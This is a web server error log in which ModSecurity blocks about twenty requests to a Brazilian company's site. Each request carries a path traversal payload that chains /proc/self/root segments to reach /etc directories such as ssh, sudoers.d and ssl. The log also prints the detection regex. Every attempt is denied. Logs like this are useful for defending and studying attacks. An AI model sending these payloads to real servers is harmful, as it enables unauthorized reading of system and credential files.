[Mon Mar 16 17:42:28.774459 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:45750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrNI6lpbStxTqkSkuDkwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:42:34.300687 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:45756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrOrABkC4fWIHEf8EPKwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:42:38.040955 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:45760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrPlajLEzk2WiQ-10sGwAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:39.388192 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:41522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrP9SswJuvopo3lOh44gAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:42:40.584161 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:41536] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrQLABkC4fWIHEf8EPLAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:42:59.535044 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:41548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrU0r9dMAiw-8KANNjQwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:43:01.964045 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.241.46:57110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrVVajLEzk2WiQ-10sOAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:43:13.208981 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:57112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrYf9ocpUE4ed4uDwMtgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:43:33.540057 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:58312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrdaQpVkWug9HeOt9OOAAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:04.412063 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:36144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrlKQpVkWug9HeOt9OWQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:05.980941 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:59332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrlVajLEzk2WiQ-10scgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:18.238167 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:59336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrorysWC90G-1nBrBeaQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:21.664093 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:53052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrpbABkC4fWIHEf8EPTwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:23.013894 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:53062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrp6TCbgAP5jq5TehFlwAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:27.601973 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:53078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrq46lpbStxTqkSkuDrQAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:29.014409 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:51964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrrY6lpbStxTqkSkuDrgAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:33.429070 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:51970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrsaTCbgAP5jq5TehFoAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:35.927152 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:51980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrs9SswJuvopo3lOh5RwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:38.596815 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.243.203:52446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrts_BxrYCr4hPDw8EVgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:39.515979 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:51994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrt0r9dMAiw-8KANNjWwAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:39.961280 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:40558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrt7ysWC90G-1nBrBebAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:41.145425 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:59874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhruVajLEzk2WiQ-10slAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
